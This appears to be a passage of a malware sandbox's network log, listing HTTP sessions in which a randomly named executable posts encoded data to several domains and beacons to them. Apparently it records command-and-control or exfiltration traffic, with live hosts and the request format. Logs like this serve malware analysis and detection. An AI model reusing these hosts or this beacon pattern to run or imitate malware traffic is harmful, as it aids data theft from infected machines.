                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.livpure-grab.online
                                                                                                                                                                                                                                              Origin: http://www.livpure-grab.online
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.livpure-grab.online/r966/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Data Ascii: 7Bohe= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 50010 | 84.32.84.32 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:19:27.867914915 CEST | 489 | OUT | GET /r966/?vD=h0e85v&7Bohe=St0zOmS57JvxXHngaoKRrYwJhw67SG7V3FAZs2TYvCYNXtW49c+AatXE2ZBTP/KNdGCD9DmtL2naWYac77vyUP4q1YSJ6U5Kf8MwRQ43aJ1o9SgGH2ER+UvSNI1J5J1sVQ== HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.livpure-grab.online
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Oct 24, 2024 15:19:28.733262062 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: hcdn
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:19:28 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 10072
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              x-hcdn-request-id: 7ca042d3e2b5c540dd4446897761e89f-int-edge1
                                                                                                                                                                                                                                              Expires: Thu, 24 Oct 2024 13:19:27 GMT
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
Oct 24, 2024 15:19:28.984857082 CEST | 1236 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 50011 | 3.33.130.190 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:19:34.029742956 CEST | 743 | OUT | POST /4nqw/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.bandukchi.com
                                                                                                                                                                                                                                              Origin: http://www.bandukchi.com
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.bandukchi.com/4nqw/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=eOQQl/eADWT2Ox+J80Bt2xdsm5goHFcjz+XTx/LNQ735DxFr9RUxEcJcc95c8knnKdUTKDB/C9XKyg4SGPywZKkoA7675RFcrfrgJhcDQpA+sxlq9/pCY1Aum4Gxd4dtUsZjocQ/98SPHSSayZdKZj0WmptnhrNrsdAvVUO16++xhBShFy3oQMyMMEGUEaB9CHVWhGQ=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 50012 | 3.33.130.190 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:19:36.579447031 CEST | 763 | OUT | POST /4nqw/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.bandukchi.com
                                                                                                                                                                                                                                              Origin: http://www.bandukchi.com
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.bandukchi.com/4nqw/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=eOQQl/eADWT2PRuJ+XptnBdrqZgoMlcnz+bTx6zjTNP5CVBr8QUxDcJcTd5VxEnwKdItKGh/C9TKyiwSG9axbakqZr65nhFcrfrgJhZuQp4+tAVq8dBBWVAth4GxXYdpUsYOoZxo96WPHQKazNBJTj1T75txkZsGpM0VeWDL6Yq4pX/LfQ/ADse0cXOjVqgUYkFm/RE9WYUEutq7d7J3J2iTwNXg


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
31    192.168.2.5    50013    3.33.130.190    80    2296    C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp    Bytes transferred    Direction    Data
Oct 24, 2024 15:19:40.036957979 CEST    1780    OUT    POST /4nqw/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.bandukchi.com
                                                                                                                                                                                                                                              Origin: http://www.bandukchi.com
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.bandukchi.com/4nqw/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Data Ascii: 7Bohe= [TRUNCATED]


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
32    192.168.2.5    50014    3.33.130.190    80    2296    C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp    Bytes transferred    Direction    Data
Oct 24, 2024 15:19:42.567866087 CEST    483    OUT    GET /4nqw/?7Bohe=TM4wmIiUDmnTKniklQ90uhNUhJ9wAlE9nf/Yl9jXXOP3K1JO7ypWLJJbcPRG/mn1E4sifjVCDcv63SEcY+fHR48yBI63+DhGjujcAAYsRe1/gzF87OhGQiowvZSxcJ02Hg==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.bandukchi.com
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Oct 24, 2024 15:19:43.190896988 CEST    403    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:19:43 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7Bohe=TM4wmIiUDmnTKniklQ90uhNUhJ9wAlE9nf/Yl9jXXOP3K1JO7ypWLJJbcPRG/mn1E4sifjVCDcv63SEcY+fHR48yBI63+DhGjujcAAYsRe1/gzF87OhGQiowvZSxcJ02Hg==&vD=h0e85v"}</script></head></html>


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
33    192.168.2.5    50015    154.9.228.56    80    2296    C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp    Bytes transferred    Direction    Data
Oct 24, 2024 15:19:49.000989914 CEST    728    OUT    POST /djad/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.mcse.top
                                                                                                                                                                                                                                              Origin: http://www.mcse.top
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.mcse.top/djad/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=Dipoa2aKDVsXkWXzz9T0Cnvmb0wjpzI/V7xHhcUjqsyioTuPmcJ+FIYFaVIaLIwnvBvsohV7Yhx5VzZ1zslsDh5sELkr2p7Di+HDvl5qX3sAc5bUSkrneUpLZLUwsF4ww6YTifWjkun6t3XMMIZJo6guYj3uONplKm0ziSjhx3+jVVPfVB6mJwLyb9nhxj7Ml8rVtZM=


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
34    192.168.2.5    50016    154.9.228.56    80    2296    C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp    Bytes transferred    Direction    Data
Oct 24, 2024 15:19:51.651341915 CEST    748    OUT    POST /djad/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.mcse.top
                                                                                                                                                                                                                                              Origin: http://www.mcse.top
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.mcse.top/djad/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=Dipoa2aKDVsXl2Lz2eL0AHvnVUwjmTI7V7tHhdQztaaiox2PnfR+GIYFR1IbI4xrvBTCohZ7Yhl5Vzp1wfNrDx4KMrkp4J7Di+HDvlcNX3kAdILURBHgQ0pMO7Uwml48w6YhieLMkoj6t2nMNZZIxKg3Uz2OFYNsPVY8hymyy1LeQji1PjyOaQnKLuvWgTal/f7lzOaU71pCYujQbhBkN8wAgwyD


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
35    192.168.2.5    50017    154.9.228.56    80    2296    C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp    Bytes transferred    Direction    Data
Oct 24, 2024 15:19:54.267066002 CEST    1765    OUT    POST /djad/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.mcse.top
                                                                                                                                                                                                                                              Origin: http://www.mcse.top
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.mcse.top/djad/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Data Ascii: 7Bohe= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 50018 | 154.9.228.56 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:19:56.823652983 CEST | 478 | OUT | GET /djad/?7Bohe=OgBIZAb3K3QVmDSyooTSIAO5Tll+jwwdUI93t9cTrZTAkguQuNIIHt4CXXwiEPUK7V7i0FBLQRxFESBesMpHDzV+LIhV5qbZyNO4rVJKeHZqQ73AKCfxWCZcLIU2txA0ig==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.mcse.top
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 50019 | 84.32.84.32 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:20:03.357672930 CEST | 743 | OUT | POST /2vbz/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.voidzero.tech
                                                                                                                                                                                                                                              Origin: http://www.voidzero.tech
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.voidzero.tech/2vbz/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=nno5Vnzppr5MD+ZmJkS5uSKhszvmGpc+z9a2BYNfbCihfKPRduBueWorCautGUi4p7egFICJWfbNWJ5a5AqRT+8aU5+q2JmM10jhP4uq+qXAYMzb3YzhmGUXS8zZQHVYGDR0PXJMk6DSUYzIP0EpmmfzhggYxoG7AJai9cr41m/bDkVinCkZtg9c0pIjxXp3crWcx7c=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 50020 | 84.32.84.32 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:20:05.903089046 CEST | 763 | OUT | POST /2vbz/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.voidzero.tech
                                                                                                                                                                                                                                              Origin: http://www.voidzero.tech
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.voidzero.tech/2vbz/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=nno5Vnzppr5MStBmOFS5mSK+gTvmNJc6z9W2Bc9Pb0yhfvrRcspudWorI6usYkijp7SGFJ+JWfPNWIJa52iWSu8YI5+kyJmM10jhP4rF+qPAYcDb05zirmUUV8zZC3VcGDQhPWlqk47SUc3IPGsmsmf1twhZxbf0aIaqytaYmkPaLy4I9gsx+ARkk6AUgnIeGIGsvsIOrm7IVMQybViXBA+Ty/ZC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 50021 | 84.32.84.32 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:20:08.450793982 CEST | 1780 | OUT | POST /2vbz/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.voidzero.tech
                                                                                                                                                                                                                                              Origin: http://www.voidzero.tech
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.voidzero.tech/2vbz/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Data Ascii: 7Bohe= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 50022 | 84.32.84.32 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:20:11.091556072 CEST | 483 | OUT | GET /2vbz/?7Bohe=qlAZWX/ch455H6hDeAWyjxeCoVjeFLImmNyoFLJZcRWWfOSwb/dYbmE5Lo+ESXiDiuCMQOi3bdztXr54sGaKYuw5X5+G7ZC+wzrMILyG35q/IsHjv6ziuhAlYbb1UGsQUw==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.voidzero.tech
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Oct 24, 2024 15:20:11.897954941 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: hcdn
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:11 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 10072
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              x-hcdn-request-id: 41a73d54845e6844977d062eeb229dfe-int-edge2
                                                                                                                                                                                                                                              Expires: Thu, 24 Oct 2024 13:20:10 GMT
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:11.898107052 CEST1236INData Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                                                                                                                                                                                                                                              Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:11.898231983 CEST1236INData Raw: 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72
                                                                                                                                                                                                                                              Data Ascii: ("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Mat
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:11.898252964 CEST524INData Raw: 77 5b 64 5d 3f 31 3a 30 29 29 29 2c 75 3d 6e 28 66 2c 69 2b 31 2c 69 3d 3d 63 29 2c 66 3d 30 2c 2b 2b 69 7d 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68 69 73 2e 54 6f 41 53 43 49 49 3d 66 75 6e 63 74
                                                                                                                                                                                                                                              Data Ascii: w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 50023 | 3.33.130.190 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:20:17.070478916 CEST | 734 | OUT | POST /cvus/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.huwin.club
                                                                                                                                                                                                                                              Origin: http://www.huwin.club
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.huwin.club/cvus/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=G4Xojkfbm0cgV+qWHqJDpy4+GdoIPIST4AJlkZSS+HgJNX0B7vYf5ICd5F4W5DW0em6a6/6sfHfAmaWotnGsLhbVDf6CyD/Z1ksqRO/blCFRf6X7TVWBWQ8PVyQxSBeq6uMKrwSxE/b9MXGVz73pqwB0YEIAaYUJPk9KC210rzsdYeg0eXVFlqQDj1Cp0RLhpq8Pt9A=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 50024 | 3.33.130.190 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:20:19.623116016 CEST | 754 | OUT | POST /cvus/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
